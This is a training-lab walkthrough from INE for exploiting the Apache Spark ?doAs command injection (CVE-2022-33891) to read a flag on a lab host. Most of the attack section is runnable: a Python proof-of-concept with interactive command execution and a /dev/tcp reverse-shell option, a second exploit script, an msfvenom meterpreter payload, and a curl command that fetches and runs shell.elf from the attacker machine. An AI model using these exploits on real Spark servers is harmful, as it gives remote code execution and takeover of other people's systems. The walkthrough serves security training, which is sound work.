Lab Walkthrough - Apache Spark Shell Command Injection
In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!
Purpose: We are learning about how to exploit Apache Spark using the Metasploit Framework module. Also, we will use the python language to write/modify existing scripts for exploiting the Apache Spark application.
Technical difficulty: Beginner
Introduction
In 2022, a critical Shell Command Injection vulnerability was found in the Apache Spark server. The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. An authentication filter, checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as.
This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
The vulnerability was discovered by Kostya Kortchinsky, a cybersecurity researcher from Databricks.
Read More: https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc
What is Command Injection?
A cyberattack known as command injection includes running unauthorized commands on the host operating system. Usually, the threat actor inserts the orders by taking advantage of an application flaw, like inadequate input validation.
Lab Environment
In this lab environment, the user will access a Kali GUI instance. A vulnerable machine Apache Spark deployed on http://demo.ine.local:8080
Goal after completing this scenario: Access the /flag.txt file and read the flag!
Tools
The best tools for this lab are:
Nmap
Bash Shell
Metasploit Framework
Python
What is Apache Spark?
Apache Spark is a multi-language engine for executing data engineering, data science, and machine learning on single-node machines or clusters.
Apache Spark Key features
Batch/streaming data
Unify the processing of your data in batches and real-time streaming, using your preferred language: Python, SQL, Scala, Java or R.
SQL analytics
Execute fast, distributed ANSI SQL queries for dashboarding and ad-hoc reporting. Runs faster than most data warehouses.
Data science at scale
Perform Exploratory Data Analysis (EDA) on petabyte-scale data without having to resort to downsampling
Machine learning
Train machine learning algorithms on a laptop and use the same code to scale to fault-tolerant clusters of thousands of machines.
Source: https://spark.apache.org/
Vulnerability Configuration
Enable the ACLs via the configuration option spark.acls.enable. i.e, conf/spark-defaults.conf
Vulnerable Source Code
private def getUnixGroups(username: String): Set[String] = {
- val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
// we need to get rid of the trailing "\n" from the result of command execution
- Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
+ Utils.executeAndGetOutput(idPath :: "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
}
}
CVE-2022–33891
Vulnerable parameter
http://demo.ine.local:8080/?doAs=`[command injection here]`
The command injection occurs because Spark checks the user group membership passed in the ?doAs parameter by using a raw Linux command.
User commands are processed through ?doAs parameter, and nothing is reflected back on the page during command execution, so this is blind OS injection. Your commands run, but there will be no indication if they worked or not or even if the program you’re running is on target.
OS commands that are passed on the URL parameters ?doAs will trigger the background Linux bash process, which calls **cmdseq** and will run the process with the command line id, -Gn.
Solution
Step 1: Open the lab link to access the Kali machine.
Kali machine
Step 2: Check if the provided machine is reachable.
Command:
ping -c 4 demo.ine.local
The provided machine is reachable.
Step 3: Check all open ports on the machine.
Command:
nmap demo.ine.local
Multiple ports are open. The Apache Spark server is running on port 8080.
Step 4: Run the firefox browser and access port 8080 to identify the Apache Spark server version.
URL: http://demo.ine.local:8080
The target Apache Spark server version is 3.1.1.
Step 5: Running the command on the target using the vulnerable parameter “?doAs.”
Just type the URL on the Kali terminal.
Command:
http://demo.ine.local:8080?doAs=`id`
Successfully executed id command on the target server and received an output.
Note: You won’t receive the output of all Linux commands
This confirms that the target is vulnerable to CVE-2022–33891
Step 6: Writing a nmap script that will detect the vulnerable spark version, i.e., 3.1.1
Nmap script
-- The Head Section --
description = [[The script to detect The Apache Spark Shell Command Injection vulnerability]]
---
-- @usage
-- nmap --script detect-spark-vuln <target>
-- @output
-- PORT STATE SERVICE
-- 8080/tcp open http
-- |_detect-spark-vuln: Apache Spark is Vulnerable to Command Injection
categories = {"default", "safe"}
local shortport = require "shortport"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
-- The Rule Section --
portrule = shortport.http
-- The Action Section --
action = function(host, port)
local uri = "/"
local text1 = "3.1.1"
local response = http.get(host, port, uri)
if ( response.status == 200 ) then
local bodystr = string.match(response.body, text1)
if ( bodystr == text1 ) then
return "Apache Spark is Vulnerable to Command Injection!!"
else
return "Apache Spark Not Vulnerable!!"
end
end
end
The script is pretty straightforward. It accesses the target on port 8080 and matches the given string, i.e., 3.1.1, then gives an output if it’s vulnerable or not.
Save the above code on the attacker’s machine and run it. The file extension should be .nse
Commands:
nano detect-spark-vuln.nse
<paste code>
Run the script.
nmap — script detect-spark-vuln.nse demo.ine.local
Successfully detected the Apache Spark server version 3.1.1 using a nmap custom script.
Step 7: Running the python script to detect the Apache Spark Command Injection vulnerability
Python Script
#!/usr/bin/env python3
import requests
import argparse
import base64
import datetime
from colorama import Fore
parser = argparse.ArgumentParser(description='CVE-2022-33891 Python POC Exploit Script')
parser.add_argument('-u', '--url', help='URL to exploit.', required=True)
parser.add_argument('-p', '--port', help='Exploit target\'s port.', required=True)
parser.add_argument('--revshell', default=False, action="store_true", help="Reverse Shell option.")
parser.add_argument('-lh', '--listeninghost', help='Your listening host IP address.')
parser.add_argument('-lp', '--listeningport', help='Your listening host port.')
parser.add_argument('--check', default=False, action="store_true", help="Checks if the target is exploitable with a sleep test")
parser.add_argument('--verbose', default=False, action="store_true", help="Verbose mode")
args = parser.parse_args()
# nothing to see here, move along!
headers = {
'User-Agent': 'CVE-2022-33891 POC',
}
# Colors :D
info = (Fore.BLUE + "[*] " + Fore.RESET)
recc = (Fore.YELLOW + "[*] " + Fore.RESET)
good = (Fore.GREEN + "[+] " + Fore.RESET)
important = (Fore.CYAN + "[!] " + Fore.RESET)
printError = (Fore.RED + "[X] " + Fore.RESET)
full_url = f"{args.url}:{args.port}"
def check_for_vuln(url):
try:
print(info + "Attempting to connect to site...")
r = requests.get(f"{url}/?doAs='testing'", allow_redirects=False, headers=headers)
if args.verbose:
print(info + f"URL request: {url}/?doAs='testing'")
print(info + f"Response status code: {r.status_code}")
if r.status_code != 403:
print(printError + "No ?doAs= endpoint. Does not look vulnerable.")
quit(1)
elif "org.apache.spark.ui" not in r.content.decode("utf-8"):
print(printError + "Does not look like an Apache Spark server.")
quit(1)
else:
print(important + "Performing sleep test of 10 seconds...")
t1 = datetime.datetime.now()
if args.verbose:
print(info + f"T1: {t1}")
run_cmd("sleep 10")
t2 = datetime.datetime.now()
delta = t2-t1
if args.verbose:
print(info + f"T2: {t2}")
print(info + f"Delta T: {delta.seconds}")
if delta.seconds not in range(8,12):
print(printError + "Sleep was less than 10. This target is probably not vulnerable")
else:
print(good + "Sleep was 10 seconds! This target is probably vulnerable!")
exit(0)
except Exception as e:
print(printError + str(e))
def cmd_prompt():
cmd = input("[cve-2022-33891> ")
return cmd
def base64_encode(cmd):
try:
message_bytes = cmd.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_cmd = base64_bytes.decode('ascii')
return base64_cmd
except Exception as e:
print(printError +str(e))
def run_cmd(cmd):
try:
if args.verbose:
print(info + "Command is: " + cmd)
base64_cmd = base64_encode(cmd)
if args.verbose:
print(info + "Base64 command is: " + base64_cmd)
exploit = f"/?doAs=`echo {base64_cmd} | base64 -d | bash`"
exploit_req = f"{full_url}{exploit}"
if args.verbose:
print(info + "Full exploit request is: " + exploit_req)
print(info + "Sending exploit...")
r = requests.get(exploit_req, allow_redirects=False, headers=headers)
if args.verbose:
print(info + f"Response status code: {r.status_code}\n"+ info + "Hint: 403 is good.")
except Exception as e:
print(printError + str(e))
quit(1)
def revshell(lhost, lport):
print(info + f"Reverse shell mode.\n" + recc+ f"Set up your listener by entering the following:\nnc -nvlp {lport}")
input(recc + "When your listener is set up, press enter!")
rev_shell_cmd = f"sh -i >& /dev/tcp/{lhost}/{lport} 0>&1"
run_cmd(rev_shell_cmd)
def main():
try:
if args.check and args.revshell:
print(printError + "Please choose either revshell or check!")
exit(1)
elif args.check:
check_for_vuln(full_url)
# Revshell
elif args.revshell:
if not (args.listeninghost and args.listeningport):
print(printError + "You need --listeninghost and --listeningport!")
exit(1)
else:
lhost = args.listeninghost
lport = args.listeningport
revshell(lhost, lport)
else:
# "Interactive" mode
print(info + "\"Interactive\" mode!\n" + important + "Note: you will not receive any output from these commands. Try using something like ping or sleep to test for execution.")
while True:
command_to_run = cmd_prompt()
run_cmd(command_to_run)
except KeyboardInterrupt:
print("\n"+ info + "Goodbye!")
if __name__ == "__main__":
main()
Copy and paste the above code into the Kali GUI and run the PoC code to check if target version is vulnerable or not.
Check the script help option.
Command:
python3 PoC.py — help
Running the script to verify the vulnerability.
Command:
python3 PoC.py -u http://demo.ine.local -p 8080 — check — verbose
Target appears to be vulnerable.
Step 8: Rewriting a simple python script to execute a command on the target server
Python Script
import requests
import argparse
import json
import random
import string
import base64
my_parser = argparse.ArgumentParser(description='Apache Spark Command Injection')
my_parser.add_argument('-T', '--URL', type=str)
args = my_parser.parse_args()
target = args.URL
def shell(target):
url = target
r = requests.get(target)
if r.status_code == 200:
print("[+] Exploiting")
print("[+] Getting the shell... :)")
while 1:
try:
command = input("# ")
command_to_encode = command.encode('ascii')
base64_format = base64.b64encode(command_to_encode)
base64_final_cmd = base64_format.decode('ascii')
print("Base64 Command: " + base64_final_cmd)
payload = f"/?doAs=`echo {base64_final_cmd} | base64 -d | bash`"
exploiting = f"{url}{payload}"
print(exploiting)
r = requests.get(exploiting, allow_redirects=False)
print("Command Executed")
except KeyboardInterrupt:
sys.exit("\nBye")
else:
print ("[*] Some issue accrued.")
shell(target)
Copy and paste the above code in the Kali GUI and run the PoC code to gain the meterpreter shell.
Check the Attacker Machine IP address:
Command:
ip addr
Generate the .elf malicious executable for reverse connection.
Command:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.27.2 LPORT=4444 -f elf > shell.elf
file shell.elf
Start Python simple HTTP server to serve the shell.elf file.
Command:
python3 -m http.server 80
Start Metasploit multi-handler for the new meterpreter session.
Command:
msfconsole -q
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 10.10.27.2
exploit
Check if the script is running correctly by checking its help option.
Command:
python3 New-PoC.py — help
It’s working fine. Run the script and download the shell.elf file on the target machine using curl by exploiting the vulnerability.
Command:
python3 New-PoC.py — URL http://demo.ine.local:8080
Command:
curl http://10.10.27.2/shell.elf — output /tmp/shell.elf; chmod +x /tmp/shell.elf; /bin/bash -c “/tmp/shell.elf”
Successfully downloaded the shell.elf file in the /tmp/ directory and executed it on the target machine. After the execution of the shell.elf file received a meterpreter session:
Step 9: Find the flag.
Command:
ls /
cat /flag.txt
FLAG: aad8ee70c54f1cc0c0aad082423b09fe
Mitigation
Upgrade to supported Apache Spark maintenance release 3.1.3, 3.2.2, or 3.3.0 or later
References
1. Apache Spark
2. PoC
Try this lab for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!